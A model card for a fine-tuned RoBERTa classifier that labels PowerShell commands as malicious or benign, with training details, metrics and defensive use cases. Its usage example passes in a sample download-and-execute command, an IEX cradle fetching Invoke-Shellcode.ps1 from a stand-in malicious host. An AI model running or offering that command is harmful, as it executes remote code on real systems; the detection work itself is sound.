finetuned-roberta-powershell-detector

Duplicate from fetterm4n/finetuned-roberta-powershell-detector

432f85a 21 days ago

2.92 kB


	# neon-roberta-finetuned-powershell-detector

	## ⚡ PowerShell Command Classifier (RoBERTa-base fine-tuned)

	This model is a fine-tuned [RoBERTa-base](https://huggingface.co/roberta-base) model for binary classification of PowerShell scripts. It predicts whether a given PowerShell command or script is malicious (1) or benign (0).

	---

	## 📦 Model Details

	- Base model: `roberta-base`
	- Task: Sequence Classification
	- Classes:
	- `0` — Benign
	- `1` — Malicious
	- Dataset: Custom-labeled dataset of real-world PowerShell commands
	- Input format: Raw PowerShell command text (single string)
	- Tokenizer: `roberta-base` tokenizer

	---

	## 🏁 Training Details

	- Epochs: 3
	- Batch size: Depends on context (e.g. 16 or 32 with gradient accumulation)
	- Optimizer: AdamW
	- Learning rate: 2e-5 with linear decay
	- Loss: Cross-entropy
	- Hardware: Fine-tuned on AWS `g5.4xlarge` with A10G GPU

	---

	## 📈 Evaluation Results

	\| Metric \| Value \|
	\|----------------\|----------\|
	\| Accuracy \| ~98.7% \|
	\| Eval Loss \| ~0.089 \|
	\| Final Train Loss \| ~0.058 \|
	\| Runtime per Epoch \| ~2 mins \|

	---

	## 🚀 How to Use

	```python
	from transformers import AutoTokenizer, AutoModelForSequenceClassification
	import torch

	tokenizer = AutoTokenizer.from_pretrained("YOUR_USERNAME/finetuned-roberta-powershell-detector")
	model = AutoModelForSequenceClassification.from_pretrained("YOUR_USERNAME/finetuned-roberta-powershell-detector")

	def classify_powershell(script):
	inputs = tokenizer(script, return_tensors="pt", truncation=True, padding=True)
	with torch.no_grad():
	outputs = model(**inputs)
	logits = outputs.logits
	prediction = torch.argmax(logits, dim=1).item()
	return "malicious" if prediction == 1 else "benign"

	example = "IEX (New-Object Net.WebClient).DownloadString('http://malicious.site/Invoke-Shellcode.ps1');"
	print(classify_powershell(example))
	```

	---

	## 🔍 Intended Use

	This model is meant for PowerShell threat detection and research use in cybersecurity automation pipelines, such as:

	- Security Operations Center (SOC) triage tools
	- Malware analysis and sandboxing systems
	- SIEM/EDR integrations
	- AI-assisted incident response

	---

	## ⚠️ Limitations & Considerations

	- This model is trained on a specific dataset of encoded PowerShell scripts and may not generalize well to obfuscated or novel attack patterns.
	- Should not be used as the sole decision-maker for security classification—best used as a signal in a larger detection system.
	- May produce false positives for rare or edge-case benign scripts.

	---

	## 📄 License

	MIT or Apache 2.0 (specify your license)

	---

	## 🙏 Acknowledgements

	- Base model from [RoBERTa (Liu et al., 2019)](https://arxiv.org/abs/1907.11692)
	- Transformers by [Hugging Face](https://huggingface.co/transformers/)